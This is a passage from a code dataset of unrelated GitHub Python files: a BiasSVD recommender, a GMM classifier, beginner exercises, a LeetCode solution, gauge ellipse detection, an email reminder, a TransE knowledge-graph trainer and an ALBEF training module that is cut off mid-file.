self.itemsDict[itemId]\n rating = trainData[index][2] * 1.0\n # The Estimation of R(u,i) can be represented as:\n # R(u,i) = meanV + Bu[u] + Bi[i] + Pu[u]^T * Qi[i]\n Rui = self.meanV + self.Bu[userIndex] + self.Bi[itemIndex] + \\\n self.Pu[userIndex].dot(self.Qi[itemIndex])\n error = rating - Rui\n sumRmse += error ** 2\n p,q = self.Pu[userIndex], self.Qi[itemIndex]\n # Update the parameters using SGD approach\n self.Bu[userIndex] += self.lr * (error - self.Lambda * self.Bu[userIndex])\n self.Bi[itemIndex] += self.lr * (error - self.Lambda * self.Bi[itemIndex])\n self.Pu[userIndex] += self.lr * (error * q - self.Lambda * p)\n self.Qi[itemIndex] += self.lr * (error * p - self.Lambda * q)\n curStep += 1\n stepTime = time.time()\n if curStep % 100000 == 0:\n print(\"Epoch %d Step %d cost time %.4f ms, train avg RMSE: %.4f\" \\\n %(i+1,curStep,1000*(time.time() - stepTime),np.sqrt(sumRmse * 1.0 / curStep)))\n\n epochRmse = np.sqrt(sumRmse * 1.0 / rateNums)\n\n if valData.any():\n _,valRmse = self.evaluate(valData)\n print(\"Epoch %d cost time %.4fs, train RMSE: %.4f, validation RMSE: %.4f\" \\\n %(i+1,(time.time()-epochTime),epochRmse,valRmse))\n\n if self.saveModel and (i + 1) % self.ckptStep == 0:\n model = (self.usersDict, self.itemsDict, self.meanV, self.Bu, self.Bi, self.Pu, self.Qi)\n model_name = 'ckpt_' + str(i + 1) + '.pkl'\n model_path = 'save_model/' + model_name\n with open(model_path, 'wb') as fi:\n pickle.dump(model, fi)\n\n return (self.usersDict, self.itemsDict, self.meanV, self.Bu, self.Bi, self.Pu, self.Qi)\n\n def evaluate(self,val):\n print('Validating the validation dataset now...')\n loss = 0.0\n preds = []\n for i in range(val.shape[0]):\n sample = val[i]\n userId = sample[0]\n itemId = sample[1]\n if userId in self.usersDict \\\n and itemId in self.itemsDict:\n userIndex = self.usersDict[userId]\n itemIndex = self.itemsDict[itemId]\n pred = self.meanV + self.Bu[userIndex] + self.Bi[itemIndex] + \\\n self.Pu[userIndex].dot(self.Qi[itemIndex])\n if pred > 1.0:\n pred = 1.0\n elif pred < 0.0:\n pred = 0.0\n preds.append(pred)\n\n if val.shape[1] == 3:\n truth = sample[2] * 1.0\n loss += (pred - truth) ** 2\n\n if (i+1) % 100000 == 0:\n print('%d data have been validated...'%(i+1))\n print('Validating has been finised...')\n\n if val.shape[1] == 3:\n rmse = np.sqrt(loss / val.shape[0])\n return pred,rmse\n\n return pred\n\n def predict(self,testData):\n return self.evaluate(self,testData)\n\n def loadModel(self,file_path):\n with open(file_path,'rb') as fi:\n model = pickle.load(fi)\n self.usersDict = model[0]\n self.itemsDict = model[1]\n self.meanV = model[2]\n self.Bu = model[3]\n self.Bi = model[4]\n self.Pu = model[5]\n self.Qi = model[6]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"forevergogi/bias_svd_with_numpy","sub_path":"model/BiasSVD.py","file_name":"BiasSVD.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36974223043","text":"'''\n Author: Jon Ander Gomez Adrian (jon@dsic.upv.es, http://personales.upv.es/jon)\n Version: 2.0\n Date: January 2021\n Universitat Politecnica de Valencia\n Technical University of Valencia TU.VLC\n\n'''\nimport os\nimport sys\nimport numpy\n\nfrom sklearn.mixture import GaussianMixture\n\nclass GMM_classifier:\n \"\"\"\n According to the Bayes' rule:\n P(c) = A priori probability of classs c\n p(x|c) = Conditional probability density of observing the sample x when the state of the system corresponds to class c\n P(c|x) = P(c)*p(x|c) / p(x) -- A posteriori probability that the system is in state c when the sample x has been observed\n p(x) = Likelihood of sample x computed as the sumatory of all P(k)*p(x|k) for all the classes, not used here for classifying\n \"\"\"\n\n def __init__(self, n_components, covar_type = 'diag', max_iter = 100, n_init = 1, verbose = 0, use_prioris = True):\n self.n_components = n_components\n self.covar_type = covar_type\n self.max_iter = max_iter\n self.n_init = n_init\n self.verbose = verbose\n self.use_prioris = use_prioris\n #\n self._estimator_type = 'classifier'\n #\n self.num_classes = -1\n self.mixtures = None\n self.prioris = None\n\n def __str__(self):\n return f'GMM_classifier(n_components = {self.n_components}, covar_type = {self.covar_type}, use_prioris = {self.use_prioris})'\n \n def fit(self, X, y):\n num_classes = len(numpy.unique(y))\n if num_classes != self.num_classes:\n self.num_classes = num_classes\n self.mixtures = [GaussianMixture(n_components = min(self.n_components, max(1, sum(y == c) // 20)),\n covariance_type = self.covar_type,\n reg_covar = 1.0e-5,\n init_params = 'random',\n max_iter = self.max_iter,\n n_init = self.n_init,\n verbose = max(0, self.verbose - 1)) for c in range(self.num_classes)]\n #\n if self.use_prioris:\n self.log_prioris = numpy.array([numpy.log(sum(y == c)) for c in range(self.num_classes)]) - numpy.log(len(y))\n else:\n self.log_prioris = numpy.ones(self.num_classes) / self.num_classes\n #\n for c in range(self.num_classes):\n if self.verbose > 0:\n print(\" GMM for class %2d ... \" % c)\n x_train = X[y == c]\n self.mixtures[c].fit(x_train)\n #\n return self\n\n\n def log_densities(self, X):\n log_densities = numpy.zeros([len(X), self.num_classes])\n for c in range(self.num_classes):\n log_densities[:,c] = self.mixtures[c].score_samples(X)\n return log_densities\n\n def log_proba(self, X):\n post = self.posteriori(X)\n post = numpy.maximum(post, 1.0e-200)\n return numpy.log(post)\n\n def predict(self, X):\n return numpy.argmax(self.log_proba(X), axis = 1)\n\n def posteriori(self, X):\n log_proba = numpy.zeros([len(X), self.num_classes])\n for c in range(self.num_classes):\n log_proba[:,c] = self.log_prioris[c] + self.mixtures[c].score_samples(X)\n #\n _m_ = log_proba.max(axis = 1).reshape(-1, 1)\n log_proba -= _m_\n proba = numpy.exp(log_proba)\n _m_ = proba.sum(axis = 1).reshape(-1, 1)\n proba /= _m_\n #\n return proba\n\nif __name__ == '__main__':\n x1 = 10 + 3 * numpy.random.randn(1000, 17)\n y1 = numpy.zeros(1000)\n x2 = -6 + 8 * numpy.random.randn(1000, 17)\n y2 = numpy.ones(1000)\n x3 = 46 + 2 * numpy.random.randn(1000, 17)\n y3 = numpy.ones(1000) * 2\n x = numpy.vstack([x1, x2, x3])\n y = numpy.hstack([y1, y2, y3]).astype(numpy.int32)\n print(x.shape)\n print(y.shape)\n gmmc = GMM_classifier(n_components = 3, covar_type = 'full', verbose = 1)\n gmmc.fit(x, y)\n z1 = 10 + 3 * numpy.random.randn(1000, 17)\n z2 = -6 + 8 * numpy.random.randn(1000, 17)\n z3 = 46 + 2 * numpy.random.randn(1000, 17)\n y1 = gmmc.predict(z1)\n y2 = gmmc.predict(z2)\n y3 = gmmc.predict(z3)\n print(sum(y1 == 0) / len(y1))\n print(sum(y2 == 1) / len(y2))\n print(sum(y3 == 2) / len(y3))\n","repo_name":"jonandergomez/machine_learning_for_students","sub_path":"machine_learning/gmm_classifier.py","file_name":"gmm_classifier.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"24557306723","text":"##1) Arithmetic operation\r\ndef add(a,b):\r\n return a+b\r\ndef sub(a,b):\r\n return a-b\r\ndef mul(a,b):\r\n return a*b\r\ndef div(a,b):\r\n return a/b\r\n\r\nprint(\"Enter the operator (+,-,/,*): \")\r\nch = input()\r\n\r\nif ch=='+':\r\n print(\"sum: \", add(2,5))\r\nelif ch=='-':\r\n print(\"substraction: \", sub(2,5))\r\nelif ch=='*':\r\n print(\"multiplication: \", mul(2,5))\r\nelif ch=='/':\r\n print(\"division: \", div(10,5))\r\nelse:\r\n print(\"Invalid operator\")\r\n\r\n\r\n##2) Binary sort\r\ndef binary_sort(a,val,first,last):\r\n if first==last:\r\n if a[first]>val:\r\n return first\r\n else:\r\n return first+1\r\n if first>last:\r\n return first\r\n mid = (first+last)//2\r\n if a[mid]< val:\r\n return binary_sort(a,val,mid+1,last)\r\n elif a[mid]> val:\r\n return binary_sort(a,val,first,mid-1)\r\n else:\r\n return mid\r\n\r\ndef sort(a):\r\n for i in range(1, len(a)):\r\n val = a[i]\r\n j = binary_sort(a, val, 0, i-1)\r\n a = a[:j] + [val] + a[j:i] + a[i + 1:]\r\n return a\r\n\r\nprint(\"Binary sorted array: \")\r\nprint(sort([10, 34, 2, 4, 6, 8, 32, 67]))\r\n\r\n\r\n#3)\r\ndef table(n):\r\n return lambda a:a*n\r\nn=2\r\nb=table(n)\r\nfor i in range (1,11):\r\n print(n,\"*\" ,i, \"=\" ,b(i))\r\n\r\n#4)\r\nnum = int(input(\"enter the number: \"))\r\nfactors=[]\r\nfor i in range(1, num+1):\r\n if num % i ==0:\r\n factors.append(i)\r\nprint(\"Factors of {} = {}\".format(num,factors))\r\n\r\n#5)\r\nimport math\r\nnum = float(input(\"Enter the number: \"))\r\nSquareroot = math.pow(num,0.5)\r\nprint(\"The square root of a given number{0}={1}\".format(num,Squareroot))\r\n\r\n#6)\r\nnum=int(input(\"Enter the number: \"))\r\n\r\nflag=False\r\n\r\nif num>1:\r\n for i in range(2, num):\r\n if(num % i) == 0:\r\n flag=True\r\n break\r\nif flag:\r\n print(num, \"is not a prime numbers\")\r\nelse:\r\n print(num, \"is a prime numbers\")\r\n","repo_name":"divyashreen-agi/python1","sub_path":"pythonasg.py","file_name":"pythonasg.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28703960711","text":"\"\"\"\nhttps://leetcode.com/problems/kth-missing-positive-number/\n\nSimple and Iterative approach.\n\"\"\"\n__author__ = \"Hwamin Kim\"\n__email__ = \"quicksort00@gmail.com\"\n__license__ = \"Apache-2.0\"\n__version__ = \"1.0.0\"\n\n\nclass Solution:\n def findKthPositive(self, arr: 'List[int]', k: int) -> int:\n \"\"\"\n The array is sorted, and we are only required to find k-th missing\n number. We can except the number of array which is smaller than k.\n\n ex)\n arr = [3, 7, 10] / k = 6\n number sequence: 1, 2, [3], 4, 5, 6, [7], 8, 9, [10]\n | | | | | |\n k: 1 2 3 4 5 6\n Therefore, answer is 8 (== k + len([3, 7]))\n \"\"\"\n for elem in arr:\n if k < elem:\n return k\n k += 1\n return k\n","repo_name":"hwaminkim/TIL","sub_path":"leetcode/1539_kth-missing-positive-number/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36186206309","text":"import time\nimport cv2\nimport numpy as np\nimport pandas as pd\n\nfrom helper import *\nfrom scipy.linalg import eig\nfrom dataclasses import dataclass\nfrom sklearn.cluster import OPTICS\nfrom skimage.morphology import skeletonize\n\n@dataclass\nclass params:\n center : tuple\n theta : float\n A : float\n B : float\n\nclass Ellipse_dlsq:\n def __init__(self) -> None:\n self.param_cluster = list()\n\n def __del__(self) -> None:\n pass\n\n def generalized_eigensystem(self, x : np.ndarray, y : np.ndarray) -> tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Formulates the generalized eigensystem problem and solves it by decomposing the system to its eigen values \n and corresponding eigenvectors. The formulation is done using the design matrix which is in turn constructed\n using the input coordinate arrays (x,y)\n \"\"\"\n # Design Matrix\n D = np.array([x*x, x*y, y*y, x, y, np.ones((x.shape), dtype=\"int\")], dtype=\"float64\").T\n # Scatter Matrix\n S = D.T @ D \n # Constraint Matrix\n C = np.zeros(S.shape, dtype=\"float64\")\n C[0,2] = C[2,0] = -2; C[1,1] = 1\n # Generalized eigensystem\n eigvals, eigvecs = eig(S, C)\n eigvals, eigvecs = np.real(eigvals), np.real(eigvecs)\n return eigvals, eigvecs\n\n def set_data(self, points : np.ndarray) -> None:\n \"\"\"\n Sets the points list and separates the x, y coordinates into separate respective arrays. This is to\n solve the generalized eigensystem\n \"\"\"\n self.data_x = np.array(points[:,0])\n self.data_y = np.array(points[:,1])\n self.len = len(self.data_x)\n return;\n\n def filter_points(self, x : np.ndarray, y : np.ndarray, idx : int, eigvecs : np.ndarray) -> tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Takes a detected ellipse, calculates the outliers of the ellipse and removes them. This then\n gives us a cleaner set of points to estimate the ellipse better on the second attempt\n \"\"\"\n ellipse = self.calculate_ellipse_params(eigvecs[:,idx].flatten())\n dist_dict = dict()\n for (xi,yi) in zip(x,y):\n h,k = ellipse.center\n K1 = (xi - h)**2 / ellipse.A ** 2\n K2 = (yi - k)**2 / ellipse.B ** 2\n dist = K1 + K2 - 1\n dist_dict[dist] = (xi,yi)\n\n keys = list(sorted(dist_dict))\n keys = keys[0:int(0.8*len(keys))]\n x_new, y_new = list(), list()\n for key in keys:\n (xi,yi) = dist_dict[key]\n x_new.append(xi)\n y_new.append(yi)\n \n return np.array(x_new), np.array(y_new)\n\n def fit_ellipse(self, points_per_sample : int = 6, n_iter : int = 50) -> list:\n \"\"\"\n Fits ellipses on batches of points for a number of iterations, and refines the ellipse fitting based on \n the distances of the chosen points from the corresponding ellipse fit. This refinement is only to avoid\n any major effects of outlier points (point/s which don't lie on the same ellipse)\n \"\"\"\n n = 0\n cluster = list()\n while n < n_iter:\n x, y = list(), list()\n idx = np.random.permutation(self.len)\n for i in range(points_per_sample):\n x.append(self.data_x[idx[i]])\n y.append(self.data_y[idx[i]])\n \n try:\n x, y = np.array(x), np.array(y)\n eigvals, eigvecs = self.generalized_eigensystem(x, y)\n # Since the system is +ve semi definite, only 1 negative eigenvalue\n idx = np.where(eigvals < 0)[0]\n # Filter the points and estimate the ellipse again to get a better estimate\n x_new, y_new = self.filter_points(x, y, idx, eigvecs)\n eigvals, eigvecs = self.generalized_eigensystem(x_new, y_new)\n idx = np.where(eigvals < 0)[0]\n cluster.append(eigvecs[:,idx])\n\n except (ValueError, IndexError, np.linalg.LinAlgError) as e:\n print(str(e) + \" in the fit_ellipse() method\")\n\n n += 1\n\n self.param_cluster = np.array(cluster).reshape(-1,6)\n \n def cluster_eigenvecs(self) -> np.ndarray:\n \"\"\"\n Implements the OPTICS (Ordering Points To Identify Cluster Structure) clustering\n to cluster the 6D eigen vector space. The centroid of the largest cluster is taken\n as the ellipse to segregate the numbers.\n \"\"\"\n clusters = OPTICS(min_samples=10).fit_predict(self.param_cluster)\n cluster_data = pd.DataFrame(list(zip(self.param_cluster, clusters)), columns=['Params', 'Cluster_id'])\n max_cluster = cluster_data['Cluster_id'].value_counts()[:5].to_dict()\n for k,_ in max_cluster.items():\n if k != -1:\n mode = k\n \n df = cluster_data.loc[cluster_data['Cluster_id'] == mode]\n param_list = np.array(df['Params'].to_list()).reshape(-1,6)\n largest_cluster = list()\n for param in param_list:\n a, b, c, _, _, _ = param\n if b**2 - 4*a*c < 0:\n largest_cluster.append(param)\n\n return np.array(largest_cluster).reshape(-1,6)\n\n def calculate_ellipse_params(self, eigenvector : np.ndarray) -> params:\n \"\"\"\n Recognizes the ellipse from a list of general conic section equations \n and extracts computes the 5 required parameters namely center_x, center_y,\n semi major axis, semi minor axis and orientation\n \"\"\"\n a,b,c,d,e,f = eigenvector[0], eigenvector[1], eigenvector[2], eigenvector[3], eigenvector[4], eigenvector[5]\n det = 4*a*c - b*b\n if det > 0:\n try:\n E = math.sqrt(b**2 + (a-c)**2)\n F = b*d*e - a*(e**2) - c*(d**2)\n q = 64 * ((f*det + F) / (det**2))\n s = 0.25 * math.sqrt(abs(q)*E)\n A = 0.125 * math.sqrt(2*abs(q)*E - 2*q*(a+c))\n B = math.sqrt((A**2) - (s**2))\n \n x0 = (b*e - 2*c*d) / det\n y0 = (b*d - 2*a*e) / det\n\n Q1 = q*a - q*c\n Q2 = q*b\n tanbac = math.atan2(b, a-c)\n if Q1 == 0 and Q2 == 0:\n theta = 0\n elif Q1 == 0 and Q2 > 0:\n theta = np.pi/4\n elif Q1 == 0 and Q2 < 0:\n theta = 3 * np.pi/4\n elif Q1 > 0 and Q2 >= 0:\n theta = 0.5 * tanbac\n elif Q1 > 0 and Q2 < 0:\n theta = 0.5 * tanbac + np.pi\n elif Q1 < 0:\n theta = 0.5 * (tanbac + np.pi) \n\n return params((x0, y0), theta, A, B)\n\n except (ValueError, IndexError, np.linalg.LinAlgError) as e:\n print(str(e) + \" in calculate_ellipse_params() method\") \n return None\n\n else:\n print(\"WARNING :- Conic section is not an ellipse\")\n return None \n\n def visualize_ellipse(self, image : np.ndarray, ellipse : params) -> None:\n \"\"\"\n For visualization purposes only\n \"\"\"\n if ellipse is not None:\n center = (int(ellipse.center[0]), int(ellipse.center[1]))\n axes = (int(ellipse.A), int(ellipse.B))\n angle = int(math.degrees(ellipse.theta))\n cv2.ellipse(image, center, axes, angle, 0, 360, (0,255,0), 2)\n\n cv2.imshow(\"image\", image)\n cv2.waitKey(0)\n\ndef main():\n image = cv2.resize(cv2.imread(\"substation_images/ferguson_pressure_gauge.png\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"substation_images/proflo_pressure_gauge.png\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"substation_images/spot_ptz_breaker_gauge.png\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"substation_images/mitsubishi_pressure_gauge.jpg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"substation_images/negative_pressure_gauge.jpg\"), (800,800), cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"substation_images/trafag_pressure_gauge.jpg\"),(800,800),cv2.INTER_CUBIC)\n\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-2.jpeg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-8.jpeg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-11.jpeg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-16.jpeg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-23.jpeg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-25.jpeg\"),(800,800),cv2.INTER_CUBIC)\n\n ell = Ellipse_dlsq()\n start = time.time()\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n if gray.std() > 70 or gray.std() < 35:\n gray = cv2.equalizeHist(gray)\n\n blur = cv2.GaussianBlur(gray, (5,5), 5)\n if calculate_brightness(image) > 0.52:\n hat = cv2.morphologyEx(blur, cv2.MORPH_BLACKHAT, cv2.getStructuringElement(cv2.MORPH_RECT, (24,24)))\n else:\n hat = cv2.morphologyEx(blur, cv2.MORPH_TOPHAT, cv2.getStructuringElement(cv2.MORPH_RECT, (24,24)))\n thresh = cv2.threshold(hat, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)[1]\n\n thresh_float = np.array(thresh, dtype=\"float64\") / 255.\n edge_map = np.array(skeletonize(thresh_float)*255., dtype=\"uint8\")\n pixels = np.argwhere(edge_map != 0)\n\n ell.set_data(pixels)\n ell.fit_ellipse(points_per_sample=1500, n_iter=100)\n eigenvector = ell.cluster_eigenvecs().mean(axis=0)\n ellipse = ell.calculate_ellipse_params(eigenvector.flatten())\n print(\"Time taken = {:4.4f}s\".format(time.time() - start))\n ell.visualize_ellipse(image, ellipse)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"computervisionmerl/Analog-Gauge-Reading","sub_path":"Pressure Gauges/ellipse_detection.py","file_name":"ellipse_detection.py","file_ext":"py","file_size_in_byte":9904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29079742790","text":"from email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\n\nclass Reminder:\n def __init__(self, data, mail_sender, validator, date):\n self.data = data\n self.mail_sender = mail_sender\n self.validator = validator\n self.date = date\n\n def check_date(self):\n for row in self.data:\n mail, name, title, return_at = row[1:]\n html = self.validator(mail, name, title, return_at, self.date)\n if html is not None:\n to_email = self.mail_sender.sender_mail\n from_email = self.mail_sender.sender_mail\n subject = 'Wypożyczenie książki [PRZYPOMNIENIE!]'\n message = MIMEMultipart()\n message['Subject'] = subject\n message['From'] = from_email\n message['To'] = to_email\n message.attach(MIMEText(html, \"html\"))\n msgBody = message.as_string()\n self.mail_sender.send_mail(self.mail_sender.sender_mail, msgBody)\n","repo_name":"krvcz/mail_sender","sub_path":"Reminder.py","file_name":"Reminder.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38514075883","text":"import os\nimport datetime\n\nfrom ke import fix_random, set_proc_title, parse_args, get_logger, Tester, Trainer\nfrom ke.data import KGMapping, KGDataset\nfrom ke.model import TransE\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch import optim\n\nargs = parse_args()\nNORM = args.NORM\nMARGIN = args.MARGIN\nVECTOR_LENGTH = args.VECTOR_LENGTH\nLEARNING_RATE = args.LEARNING_RATE\nEPOCHS = args.EPOCHS\nVALIDATE_FREQUENCY = args.VALIDATE_FREQUENCY\nFILTER_FLAG = args.FILTER_FLAG\nUSE_GPU = args.USE_GPU\nGPU_INDEX = args.GPU_INDEX\nDATASET_PATH = args.DATASET_PATH\nCHECKPOINT_PATH = args.CHECKPOINT_PATH\nTRAIN_BATCH_SIZE = args.TRAIN_BATCH_SIZE\nVALID_BATCH_SIZE = args.VALID_BATCH_SIZE\nTEST_BATCH_SIZE = args.TEST_BATCH_SIZE\nTARGET_METRIC = args.TARGET_METRIC\nTARGET_SCORE = args.TARGET_SCORE\nSEED = args.SEED\nPROC_TITLE = args.PROC_TITLE\nLOG = args.LOG\nNUM_WORKERS = args.NUM_WORKERS\n\nif __name__ == \"__main__\":\n now = datetime.datetime.now()\n date = f\"{now.year}-{now.month}-{now.day}\"\n logger = get_logger(date+\".txt\") if LOG else None\n message = f\"\\nMARGIN:{MARGIN}, NORM:{NORM}, VECTOR_LENGTH:{VECTOR_LENGTH}, LEARNING_RATE:{LEARNING_RATE}\\n\" \\\n f\"EPOCHS:{EPOCHS}, VALIDATE_FREQUENCY:{VALIDATE_FREQUENCY}, FILTER_FLAG:{FILTER_FLAG}\\n\" \\\n f\"USE_GPU:{USE_GPU}, GPU_INDEX:{GPU_INDEX}, SEED:{SEED}, PROC_TITLE:{PROC_TITLE}\\n\" \\\n f\"DATASET_PATH:{DATASET_PATH}, CHECKPOINT_PATH:{CHECKPOINT_PATH}\\n\" \\\n f\"TRAIN_BATCH_SIZE:{TRAIN_BATCH_SIZE}, VALID_BATCH_SIZE:{VALID_BATCH_SIZE}, \" \\\n f\"TEST_BATCH_SIZE:{TEST_BATCH_SIZE}\\n\" \\\n f\"TARGET_METRIC:{TARGET_METRIC}, TARGET_SCORE:{TARGET_SCORE}\\n\" \\\n f\"LOG:{LOG}, NUM_WORKERS:{NUM_WORKERS}\\n\"\n print(message)\n if LOG:\n logger.info(\"-\"*20+f\" {date} \"+\"-\"*20)\n logger.info(message)\n\n if not os.path.isdir(\"ckpt\"):\n os.mkdir(\"ckpt\")\n fix_random(SEED)\n set_proc_title(PROC_TITLE)\n FB15K_path = DATASET_PATH\n train_path = os.path.join(FB15K_path, \"train.txt\")\n valid_path = os.path.join(FB15K_path, \"valid.txt\")\n test_path = os.path.join(FB15K_path, \"test.txt\")\n checkpoint_path = CHECKPOINT_PATH\n\n print(\"preparing knowledge graph data...\", end='')\n if LOG:\n logger.info(\"preparing knowledge graph data...\")\n\n fb15k_mapping = KGMapping(FB15K_path)\n n_entity = fb15k_mapping.n_entity\n n_relation = fb15k_mapping.n_relation\n\n fb15k_train_dataset = KGDataset(train_path, fb15k_mapping, filter_flag=FILTER_FLAG)\n fb15k_train_dataloader = DataLoader(fb15k_train_dataset, TRAIN_BATCH_SIZE, num_workers=NUM_WORKERS)\n fb15k_valid_dataset = KGDataset(valid_path, fb15k_mapping)\n fb15k_valid_dataloader = DataLoader(fb15k_valid_dataset, VALID_BATCH_SIZE)\n fb15k_test_dataset = KGDataset(test_path, fb15k_mapping)\n fb15k_test_dataloader = DataLoader(fb15k_test_dataset, TEST_BATCH_SIZE)\n\n print(\"done\")\n if LOG:\n logger.info(\"done\")\n\n message = f\"entity_count:{n_entity}, n_relation_count:{n_relation}\\n\" \\\n f\"train_triplets_count:{fb15k_train_dataset.n_triplet}, \" \\\n f\"valid_triplets_count:{fb15k_valid_dataset.n_triplet}, \" \\\n f\"test_triplets_count:{fb15k_test_dataset.n_triplet}\\n\"\n print(message)\n if LOG:\n logger.info(message)\n\n if USE_GPU:\n assert GPU_INDEX < torch.cuda.device_count()\n device = torch.device('cuda:' + str(GPU_INDEX)) if USE_GPU else torch.device('cpu')\n\n print(\"preparing model...\", end='')\n if LOG:\n logger.info(\"preparing model...\")\n\n transe = TransE(n_entity, n_relation, VECTOR_LENGTH, p_norm=NORM, margin=MARGIN)\n transe = transe.to(device)\n optimizer = optim.SGD(transe.parameters(), lr=LEARNING_RATE)\n # optimizer = optim.Adam(transe.parameters(), lr=LEARNING_RATE)\n validator = Tester(model=transe, data_loader=fb15k_valid_dataloader, device=device,\n filter_flag=FILTER_FLAG)\n tester = Tester(model=transe, data_loader=fb15k_test_dataloader, device=device,\n filter_flag=FILTER_FLAG)\n trainer = Trainer(model=transe, train_dataloader=fb15k_train_dataloader, optimizer=optimizer,\n device=device, epochs=EPOCHS, validation_frequency=VALIDATE_FREQUENCY,\n validator=validator, checkpoint_path=checkpoint_path,\n target_metric=TARGET_METRIC, target_score=TARGET_SCORE,\n log_write_func=logger.info if LOG else None)\n\n print(\"done\")\n if LOG:\n logger.info(\"done\")\n print(transe)\n if LOG:\n logger.info(transe)\n\n print(\"-\" * 20, \"start training epochs\", \"-\" * 20)\n if LOG:\n logger.info(\"-\" * 20 + \" start training epochs \" + \"-\" * 20)\n\n exit_epoch, best_metric_score, loss_sum, loss_mean = trainer.run()\n message = f\"exit epoch: {exit_epoch}, loss_sum: {loss_sum}, loss_min:{loss_mean} \\n\" \\\n f\"best {TARGET_METRIC} on validation: {best_metric_score}\"\n print(message)\n if LOG:\n logger.info(message)\n\n transe.load_checkpoint(checkpoint_path)\n hits_at_1, hits_at_3, hits_at_10, mr, mrr = tester.link_prediction()\n\n message = f\"test --- \" \\\n f\"h1: {hits_at_1:<6.3f}% | \" \\\n f\"h3: {hits_at_3:<6.3f}% | \" \\\n f\"h10: {hits_at_10:<6.3f}% | \" \\\n f\"mr: {mr:<6.3f} | \" \\\n f\"mrr: {mrr:<6.3f} | \"\n print(message)\n if LOG:\n logger.info(message)\n logger.info(\"-\" * 50)\n","repo_name":"YoRHazzz/ke","sub_path":"TransE.py","file_name":"TransE.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39461649902","text":"import pytorch_lightning as pl\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom .model_retrieval import ALBEF\nfrom ..optim import create_optimizer\nfrom ..scheduler import WarmupCosineAnnealingLR\n\n\nclass ALBEFModule(pl.LightningModule):\n def __init__(self,\n alpha,\n warm_up,\n model_kwargs,\n optimizer_kwargs,\n lr_scheduler_kwargs,\n ):\n super().__init__()\n self.save_hyperparameters()\n self.hparams.model = type(self).__name__\n\n self.model = ALBEF.from_cktp(model_kwargs)\n\n def training_step(self, train_batch, batch_idx):\n image, text, idx = train_batch\n\n if self.current_epoch > 0 or not self.hparams.warm_up:\n alpha = self.hparams.alpha\n else:\n alpha = self.hparams.alpha * min(1, batch_idx / self.trainer.num_training_batches)\n\n loss_ita, loss_itm, matching_score = self.model(image, text, alpha=alpha, idx=idx)\n loss = loss_ita + loss_itm\n matching_acc = (matching_score >= 0.5).sum() / image.shape[0]\n\n self.log_dict(dict(loss=loss_itm+loss_ita, loss_itm=loss_itm, loss_ita=loss_ita,\n train_matching_acc=matching_acc), sync_dist=True, on_epoch=True)\n return loss\n\n # def on_train_epoch_end(self) -> None:\n # self.trainer.train_dataloader.loaders.dataset.setup()\n\n def validation_step(self, val_batch, batch_idx):\n image, text, idx = val_batch\n loss_ita, loss_itm, matching_score = self.model(image, text, alpha=self.hparams.alpha, idx=idx)\n matching_acc = (matching_score >= 0.5).sum() / image.shape[0]\n\n self.log_dict(\n {'val_loss': loss_itm + loss_ita, 'val_loss_itm': loss_itm, 'val_loss_ita': loss_ita,\n f'val_matching_acc': matching_acc},\n prog_bar=True,\n sync_dist=True)\n\n def configure_optimizers(self):\n optimizer = create_optimizer(self.hparams.optimizer_kwargs, self.model)\n\n warmup_steps = int(self.hparams.lr_scheduler_kwargs.pop('warmup_epochs') * (\n self.estimated_stepping_batches // self.trainer.max_epochs))\n scheduler = {\n \"scheduler\": WarmupCosineAnnealingLR(optimizer,\n warmup_steps=warmup_steps,\n max_steps=self.estimated_stepping_batches,\n **self.hparams.lr_scheduler_kwargs),\n \"interval\": \"step\",\n \"frequency\": 1,\n }\n return [optimizer], [scheduler]\n\n @property\n def estimated_stepping_batches(self):\n effective_accum = self.trainer.accumulate_grad_batches * self.trainer.num_devices\n batches = len(self.trainer.datamodule.train_dataloader())\n return (batches // effective_accum) * 